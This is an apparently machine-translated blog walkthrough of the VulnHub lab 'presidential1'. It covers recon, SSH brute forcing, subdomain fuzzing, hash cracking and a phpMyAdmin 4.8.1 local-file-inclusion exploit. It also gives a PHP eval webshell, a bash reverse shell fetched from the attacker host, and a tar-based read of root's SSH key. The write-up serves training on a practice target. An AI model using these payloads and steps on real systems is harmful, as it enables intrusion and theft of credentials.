【vulnhub】presidential1

Blog home page ： Happy star The blog home page of
Series column ：vulnhub
Welcome to focus on the likes collection ️ Leaving a message.
Starting time ：2022 year 7 month 6 Japan
The author's level is very limited , If an error is found , Please let me know , thank ！

Because the target plane is host-only Pattern
We will kali It's also set to host-only Pattern

The host found

arp-scan -l

If the host number is too large or too small, throw it away , Because it may be a gateway or something
So the target ip by 192.168.110.128

Port scanning

nmap -sV -p- 192.168.110.128

visit 80 port

See information about someone's name , You may need to use cwel

dirb Directory scanning

dirb http://192.168.110.128

assets Catalog , Let's take a look at

Website source code , See if you have scanned sensitive files , I didn't find any sensitive files

cgi-bin Catalog 403

nikto and whatweb To collect information

whatweb 192.168.110.128

nikto --url 192.168.110.128

Visit config.php, There is indeed this file , But it's empty
Then try whether it's a backup file config.phps 、config.php.bak

visit icons/README

All of a sudden dirb There was suspicion , Why are these files not scanned

dirsearch Scan the directory again

./dirsearch.py -u http://192.168.110.128

It does config.php.bak
Because I thought it would download automatically , I didn't check the source code

Get the account and password of the database

open about.html

Other sections cannot be accessed , Only HOME and ABOUT
So this page is a static page

Try to login with the obtained account and password ssh service

ssh -p 2082 [email protected]

I don't know what's going on

cewl Crawl dictionary

cewl http://192.168.110.128 -w dic0.txt

hydra Blast ssh

hydra -L dic0.txt -P dic0.txt ssh://192.168.110.128

Look at this error message , And above votebox Error message
It should require a key , Instead of using passwords directly

Subdomain explosion

There is no more information to use
Explode subdomains

But now we only have servers ip Address , There is no domain name

So the domain name of the website is votenow.local

change host file

vim /etc/hosts
192.168.110.128 votenow.local

Want to use gobuster、oneforall To blow up the subdomain , But they are not well configured

Use wfuzz
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.local

stay Prime1 Drone aircraft fuzz Parameters are used ,-w Specify a dictionary ,-H Specify the request header , --hw and --hc Is the result of removing the response to a specified length

Get a subdomain datasafe
write in hosts file

vim /etc/hosts
192.168.110.128 datasafe.votenow.local

Log in to the database

Log in with the obtained database account


Got it admin And password

john Crack the code

【Try to Hack】john Hash cracking tool

obtain admin The password for Stella

Try to use admin Sign in ssh( Failure )

ssh -p 2082 [email protected]

You really need a certificate

phpmyadmin Vulnerability penetration

Tell us the version number 4.8.1
searchsploit phpmyadmin

cp /usr/share/exploitdb/exploits/php/webapps/50457.py /root

This RCE Of CVE I don't know how to use it

Follow others to use the file to include a copy

phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)                                             | php/webapps/44924.txt
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)                                             | php/webapps/44928.txt

searchsploit -x php/webapps/44928.txt

structure url
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_d4qpkliuhiq1anqdkqgc8v10qnq5teq8

It reappears successfully

Now we can write a sentence, Trojan horse <?php eval($_GET["ant"]); ?>

select "<?php echo file_put_contents('/var/www/html/s.php',base64_decode('PD9waHAgZXZhbCgkX0dFVFsiYW50Il0pOyA/Pg=='));exit;?>"

There may be something wrong with finding this , Not even , Direct rebound shell
cd /var/www/html | echo 'bash -i >& /dev/tcp/192.168.110.129/1100 0>&1' > shell.sh
python -m SimpleHTTPServer 80
nc -lvvp 1100

perform sql
select '<?php system("wget 192.168.110.129/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'

Get an interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'

Raise the right

su admin

tarS -cvf key.tar /root/.ssh/id_rsa
tar -xvf key.tar
cd root/.ssh
ssh -i id_rsa root@localhost -p 2082

end